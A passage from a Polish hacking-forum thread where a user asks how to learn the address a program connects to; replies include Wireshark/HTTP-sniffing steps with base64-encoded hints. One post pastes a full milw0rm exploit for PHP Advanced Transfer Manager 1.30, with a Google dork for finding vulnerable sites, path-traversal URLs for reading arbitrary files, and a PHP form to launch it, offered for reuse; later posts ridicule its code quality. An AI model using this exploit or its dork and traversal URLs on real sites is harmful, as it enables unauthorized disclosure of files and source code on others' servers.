Strona 2 z 3 PierwszyPierwszy 123 OstatniOstatni
Pokaż wyniki 11 do 20 z 23

Temat: adres

  1. #11

    Domyślnie

    Mam cos takiego.Tam gdzie jest zamazane jest adres tej strony z ktora laczy sie ten program.

    http://img56.imageshack.us/my.php?image=screenyi8.jpg

  2. #12

    Domyślnie

    Nikt nic nie opdposuje. Zakladam ze zrobiles cos zle i prosze was , czy moglby mi ktos wytlumaczyc krok po kroku, co trzeba zrobic , zeby zdobyc PELNY adres strony , z ktora dany plik chce sie polaczyc

  3. #13
    Zarejestrowany
    Sep 2007
    Skąd
    Różne zakątki sieci.
    Postów
    995

    Post

    A. Przeczytaj rfc HTTP, zwróć szczególną uwagę na REQEST i na nagłówek HOST, oraz ewentualny Concent i wypieki.
    B. Przeczytaj manual WireShark'a
    C. Podsłuchaj nieco ruchu.
    D. Wyfiltruj zapytania HTTP
    E. Przeczytaj pierwszy wiersz pola danych
    F. Dowiedz się z nagłówka host, gdzie się połączyłeś
    G. Upewnij się co do typu zapytania (POST/GET).
    H. Znajdź pakiety z interesującymi Cię danymi.
    I. Spróbuj zrobić filter, który będzie sam łapał interesujące Cię dane.
    J. Ładnie podziękuj użytkownikom i administracji za pomoc.
    K. Jeśli to rozwiąże twój problem, powiadom nas o tym, oraz dokładnie opisz jak doszedłeś do rozwiązania.
    L. ... Nie mam pomysłu...

    Kod:
    UGFtaWV0YWNpZSBwZXduYSBtb2RlIGt0b3JhIHphcG9jemF0a293YWxlbT8KUG9kcG93aWVkeiB3
    IHR5bSBrb2R6aWUsIHBpZXJ3c3phIGxpbmlhIHphcHl0YW5pYSBtb3dpIENpIGRvIGt0b3JlZ28g
    cGxpa3UgCm5hIHNlcndlcnplIGRvc3RhamUgc2llIHR3b2phIHByemVnbGFkYXJrYS4gTnAuCkdF
    VCAvd2lraS9pbmRleC5waHAgSFRUUC8xLjAKCk1vd2kgQ2kgemUgcHJ6ZWdsYWRhcmthIGRvc3Rh
    amUgc2llIGRvIHBsaWt1IG8gc2NpZXpjZSAiL3dpa2kvaW5kZXgucGhwIi4KVyB0eW0gd3lwYWRr
    dSBpbmRleC5waHAgbW96ZW15IG9taW5hYywgYWxlIGRvZGFsZW0gZ28gYnkgYnlsbyBsYXR3aWVq
    LgpOYWdsb3dlayBob3N0IG9rcmVzbGEgbmFqY3plc2NpZWogbmF6d2UgZG9tZW5vd2Egc2Vyd2Vy
    YSwgYnkgdGVuLCBvIGlsZSAKbWEgd2llbGUgc2Vyd2lzb3csIHdpZWR6aWFsIGt0b3J5IG1hIENp
    IGFrdHVhbG5pZSB6YXNlcndvd2FjLgpDaWFzdGthIHNhIGN6ZXN0byB3YXpuZSBkbyB1dHJ6eW1h
    bmlhIHNlc2ppLgpKZXNsaSB6YXB5dGFuaWUgamVzdCBQT1NUIHRvIG5pZSB3eXN0YXJjenkgemUg
    cHJ6ZWtvcGl1amVzeiBsaW5rIGkgd3J6dWNpc3ogCmRvIHByemVnbGFkYXJraSwgbXVzaXN6IGRv
    ZGF0a293byB3eXNsYWMgZGFuZSBQT1NUJ2EgYnkgb3RyenltYWMgemJsaXpvbmUgCmx1YiBuYXdl
    dCB0YWtpZSBzYW1lIHd5bmlraSBqYWsgcG9kc2x1Y2hhbnkuCgpQb3pkcmF3aWFtLApOaWtvd3Nr
    aS4K
    EDIT:
    Kod:
    UFM6IEpha2J5cyBjaGNpYWwgd2llY2VqIGluZm8sIGx1YiBieXMgc29iaWUgZGFsZWogbmllIG1v
    Z2wgcG9yYWR6aWMsCnphcHJhc3phbSBuYSBJUkMuIFR5bGtvIG5pa29tdSBuaWUgbW93IHplIGpl
    c3RlbSBtaWx5LCBkbHVnbyBwcmFjb3dhbGVtCm5hIHJlcHV0YWNqZSBhcm9nYW5ja2llZ28gZHJh
    bmlhLCBrdG9yeSBiYXdpIHNpZSB1Y3p1Y2lhbWkgaW5ueWNoIAp0eWxrbyBkbGEgcm96cnl3a2ku
    Cg==
    Pogłówkuj (SAM!) nieco nad tymi kodami, a uzyskasz upragnioną odpowiedź.
    Ostatnio edytowane przez Nikow : 11-09-2008 - 13:47
    http://nikowek.blogspot.com/
    Zbrojne Ramię Pingwina!
    -----BEGIN GEEK CODE BLOCK-----
    Version: 3.12
    GCS d- s++:++ a--- C+++ UL+++ P L+++ E--- W++ N++ o K- w--
    O M- V- PS PE Y PGP++ t+ 5 X+ R tv- b++ DI- D-
    G+ e- h! r% y?
    ------END GEEK CODE BLOCK------

  4. #14
    Zarejestrowany
    Oct 2008
    Skąd
    W Sieci !!!
    Postów
    282

    Domyślnie

    Masz od wuja...


    Przerób sobię i działaj...



    <?

    /*
    ::::::::: :::::::::: ::: ::: ::::::::::: :::
    :+: :+: :+: :+: :+: :+: :+:
    +:+ +:+ +:+ +:+ +:+ +:+ +:+
    +#+ +:+ +#++:++# +#+ +:+ +#+ +#+
    +#+ +#+ +#+ +#+ +#+ +#+ +#+
    #+# #+# #+# #+#+#+# #+# #+#
    ######### ########## ### ########### ##########
    ::::::::::: :::::::::: ::: :::: ::::
    :+: :+: :+: :+: +:+:+: :+:+:+
    +:+ +:+ +:+ +:+ +:+ +:+:+ +:+
    +#+ +#++:++# +#++:++#++: +#+ +:+ +#+
    +#+ +#+ +#+ +#+ +#+ +#+
    #+# #+# #+# #+# #+# #+#
    ### ########## ### ### ### ###

    - - [DEVIL TEAM THE BEST POLISH TEAM] - -


    Exploit Name: PHP Advanced Transfer Manager <= 1.30 Source Code Disclosure Exploit
    Script Name: PHP Advanced Transfer Manager 1.30
    Script Site: http://phpatm.free.fr/
    dork: "Powered by PHP Advanced Transfer Manager v1.30"
    Find by: Kacper (a.k.a Rahim)


    ========> DEVIL TEAM IRC: irc.milw0rm.com:6667 #devilteam <========
    ========> http://www.rahim.webd.pl/ <========

    Contact: [email protected]
    -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
    Greetings DragonHeart and all DEVIL TEAM Patriots
    - Leito & Leon | friend str0ke

    Blund Coder, D0han, d3m0n, D3m0n , dn0d'e, DUREK5, fdj, Grzegorz, GrZyB997, konsol, Mandr4ke,
    mass, michalind, mIvus, Nua, nukedclx, pepi, QunZ, Qw3rty, RebeL, SkD, Adam, arkadius, asteroid, blue, Ci2u, CrazzyIwan,
    DMX, drzewko, ExTrEmE][-][ack, Gelo, Kicaj, Larry, Leito, LEON, Michas, Morpheus, MXZ, Ramzes, redsaq, TomZen

    and

    Dr Max Virus
    TamTurk,
    hackersecurity.org

    -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
    Greetings for 4ll Fusi0n Group members
    and all members of hacker.com.pl
    -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

    in folder users we dont find any file like: .htaccess so we can read all files

    http://site.gov.pl/upload/users/Admin

    Admin < username

    or you can read all files in ftp

    http://site.gov.pl/upload/viewers/ht...r=..&filename=[file]
    http://site.gov.pl/upload/viewers/ht...r=..&filename=[file]


    GAME OVER
    */
    //Settings
    $nick = "Admin";
    $glowna = "http://site.com/path/";
    $exploit = "1"; //$exploit = "0"; < exploit off
    //End Settings

    //************************************************** ************************************************** ************************************************
    if ( $exploit == "1" ) {
    $exp= "<title>PHP Advanced Transfer Manager &lt;= 1.30 Source Code Disclosure Exploit :: DEVIL TEAM :: The Best Polish Team ::</title>"
    ."<style type=\"text/css\">"
    ."body {background-color: #000000;}"
    ."body,td,th {color: #FFFFFF;}"
    .".name {font-size:11px;font-weight: bold}"
    ."</style><form method=\"get\" action=\"".$glowna."/users/".$nick."\">"
    ."<div align=\"center\"><img src=\"http://www.rahim.webd.pl/index_r2_c3.jpg\"></div>"
    ."<p align=\"center\">script url:<br>"
    ."<input type=\"text\" name=\"glowna\" size=\"90\" value=\"".$glowna."\">"
    ."<br>"
    ."Admin nick:<br>"
    ."<input name=\"nick\" type=\"text\" value=\"".$nick."\" size=\"90\"".$nick."\">"
    ."<br>"
    ."<input type=\"submit\" value=\"Exploit\" name=\"submit\">"
    ."</p>"
    ."<p align=\"center\">Find by: <a href=\"mailto:[email protected]\">Kacper</a> (a.k.a <a href=\"mailto:[email protected]\">Rahim</a>)<br>"
    ."<br>"
    ."DEVIL TEAM IRC: irc.milw0rm.com:6667 #devilteam<br>"
    ."<br>"
    ."Contact: <a href=\"mailto:[email protected]\">kacper1964@yah oo.pl</a><br>"
    ."or</p>"
    ."<p align=\"center\"> <a href=\"http://www.rahim.webd.pl\">http://www.rahim.webd.pl/</a></p>"
    ."<p align=\"center\" class=\"name\">&nbsp;</p>"
    ."<HR WIDTH=\"650\" ALIGN=\"center\">"
    ."<p align=\"center\"> Z Dedykacja dla osoby,<br>"
    ."bez ktorej nie mogl bym zyc...<br>"
    ."K.C:* J.M (a.k.a Magaja)</p>"
    ."<p align=\"center\"> Special Greetz: DragonHeart ;-)<br>"
    ."Ema: Leito, Leon, Adam, DeathSpeed, Drzewko, pepi, mivus<br>"
    ."SkD, nukedclx, Ramzes<br>"
    ."<br>"
    ."Greetz for all users DEVIL TEAM IRC Channel !!<br>"
    ."!@ Przyjazni nie da sie zamienic na marne korzysci @!</p>"
    ."<HR WIDTH=\"650\" ALIGN=\"center\">"
    ."<p align=\"center\">&nbsp; </p>"
    ."</form>";
    print $exp;
    }
    ?>

    # milw0rm.com [2006-12-20]

    Wklejam caly dla marudnych.Mam tylko na tyle czasu by to wklejic...

    Stary ale jary

    Chyba wiesz gdzie poczatek ?
    A jak nie poradzisz wujek poradzi...

    Przyda Ci sie ;> Chociaz na wzor
    Ostatnio edytowane przez Mandr4ke : 11-09-2008 - 14:45
    "Wszystkie komputery PC są kompatybilne, ale niektóre są kompatybilniejsze od innych... Twój jest zawsze mniej kompatybilny..."

  5. #15
    Zarejestrowany
    Jun 2006
    Skąd
    rand(.eu)
    Postów
    8,748

    Domyślnie

    Hehe Mandr4ke... a co by tak gdyby tak... tak jak z phish'em robia :-)
    ... czyli sprzedaja toolkit a w kodzie jest jak wol, ze kopia danych idzie do nich
    ctrl-alt-del.cc - soft reset site for IT admins and other staff :-)

  6. #16
    Zarejestrowany
    Apr 2008
    Postów
    200

    Domyślnie

    Autorowi tego śmiesznego "exploita" sugeruję, aby trochę poczytał o tym jak poprawnie programować w PHP.

  7. #17
    Zarejestrowany
    Jul 2007
    Skąd
    C:\Perl\bin
    Postów
    1,578

    Domyślnie

    Cytat Napisał elceef Zobacz post
    Autorowi tego śmiesznego "exploita" sugeruję, aby trochę poczytał o tym jak poprawnie programować w PHP.
    wiesz co? to samo mi na mysl przyszlo :>
    War, war never changes.

  8. #18
    Zarejestrowany
    Oct 2008
    Skąd
    W Sieci !!!
    Postów
    282

    Domyślnie

    milw0rm.com [2006-12-20].....Jego autor wtedy mial 14 lat...Wiec wydaje mi sie ze smieszne to nie jest...No moze dzisiaj
    "Wszystkie komputery PC są kompatybilne, ale niektóre są kompatybilniejsze od innych... Twój jest zawsze mniej kompatybilny..."

  9. #19

    Domyślnie

    No tak powinien był wykorzystać smarty i templatki

    Może nam pokażesz elcef jak się powinno pisać exploity

  10. #20
    Zarejestrowany
    Apr 2008
    Postów
    200

    Domyślnie

    @Egoalter
    Przeczytaj jeszcze raz mojego poprzedniego posta. Tym razem postaraj się ze zrozumieniem.

Podobne wątki

  1. adres ip
    By klop182 in forum TCP/IP/Analiza/Badanie
    Odpowiedzi: 4
    Autor: 05-04-2008, 21:37
  2. adres IP
    By SDM in forum TCP/IP/Analiza/Badanie
    Odpowiedzi: 14
    Autor: 07-26-2007, 10:04
  3. adres MAC liveboxa
    By michalski007 in forum Hacking
    Odpowiedzi: 17
    Autor: 05-18-2007, 19:10
  4. adres Mac
    By beti in forum Hacking
    Odpowiedzi: 16
    Autor: 05-10-2007, 17:32
  5. chodzi o adres ip
    By ironwall in forum Newbie - dla początkujących!
    Odpowiedzi: 3
    Autor: 01-21-2007, 20:18

Zasady Postowania

  • Nie możesz zakładać nowych tematów
  • Nie możesz pisać wiadomości
  • Nie możesz dodawać załączników
  • Nie możesz edytować swoich postów
  •  
Subskrybuj